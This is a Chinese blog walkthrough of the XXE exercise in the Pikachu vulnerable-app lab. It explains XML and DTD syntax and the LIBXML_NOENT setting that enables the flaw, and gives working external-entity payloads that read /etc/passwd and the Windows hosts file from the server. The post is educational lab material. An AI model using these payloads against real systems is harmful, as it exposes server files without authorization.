zoukankan      html  css  js  c++  java
  • pikachu靶场——XXE(xml外部实体注入)

    概述

    XXE -"xml external entity injection",既"xml外部实体注入漏洞"。
    概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

    xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。

    第一部分:XML声明部分
    <?xml version="1.0"?>

    第二部分:文档类型定义 DTD
    <!DOCTYPE note[
    <!--定义此文档是note类型的文档-->
    <!ENTITY entity-name SYSTEM "URI/URL">
    <!--外部实体声明-->
    ]]]>

    第三部分:文档元素
    <note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
    </note>

    DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部.

    DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

    内部申明DTD格式
    <!DOCTYPE 根元素 [元素申明]>

    外部引用DTD格式
    <!DOCTYPE 根元素 SYSTEM "外部DTD的URI">

    引用公共DTD格式
    <!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

    外部实体引用 Payload

    <?xml version="1.0"?>

    <!DOCTYPE ANY[
    <!ENTITY f SYSTEM "file:///etc/passwd">
    ]>

    <x>&f;</x>

    外部引用可以支持http,file,ftp等协议。

    如果一个接口支持接收xm|数据,且没有对xml数据做任何安全上的措施,就可能导致XXE漏洞。

    simplexml_load_string()

    函数转换形式良好的XML 字符串为 SimpleXMLElement 对象。

    在PHP 里面解析 xml 用的是 libxml, 其在 2.9.0 的版本中 默认是禁止解析 xml 外部实体内容的。

    XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致攻击者可以构造一个恶意的XML。

    XXE漏洞

     在进行演示之前,我们可以看一下后端源代码。它会通过POST请求,去获取前端的下xml数据,获取后就会传到simplexml_load_string()这个函数,如果PHP的版本大于2.9.0的话,这个函数是默认禁止的,但在这里,他为了制造一个漏洞,就通过LIBXML_NOENT这个函数开启了外部实体来构造XXE漏洞。也就是说,在这个漏洞中,把xml数据传给simplexml_load_string(),这个函数就会对数据的外部实体内容进行解析,然后再返回给前端。

    打开pikachu靶场,随便输入内容提交,它会提示要输入xml才行

    我们可以输入一个正确的payload

    <?xml version = "1.0"?>
    <!DOCTYPE note [
        <!ENTITY hacker "XXE hahaha">
    ]>
    <name>&hacker;</name>

    提交后,可以看到前端返回了我们在xml中的DTD定义变量的值

    接下来。我们可以去构造一个恶意的payload,通过外部实体引用从而去获取后台服务器的本地文件信息(注:外部引用可以支持http,file,ftp等协议。)

    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///C://Windows/System32/drivers/etc/hosts">    <!--要根据后台服务器的系统,输入正确的文件路径-->
    ]>
    <x>&f;</x>

    提交后,页面显示了后台服务器的本地文件hosts的信息

     总结漏洞产生原因:实际上是因为后端在接收xml数据时,开启了外部实体解析,而且也没对传来的数据做任何的过滤等安全措施,因此导致产生漏洞。

  • 相关阅读:
    修改mysql密码的四种方法
    phpcms模板生成原理
    如何给虚拟主机安装phpMyAdmin
    如何修改数据库密码
    web 服务器、PHP、数据库、浏览器是如何实现动态网站的
    编写shell时,提示let/typeset:not found
    Linux下采用VI编辑器删除复制或移动多行文本内容
    BASH 学习笔记小结
    list容器的C++代码实现
    Groovy入门教程
  • 原文地址:https://www.cnblogs.com/QingR/p/13322596.html
Copyright © 2011-2022 走看看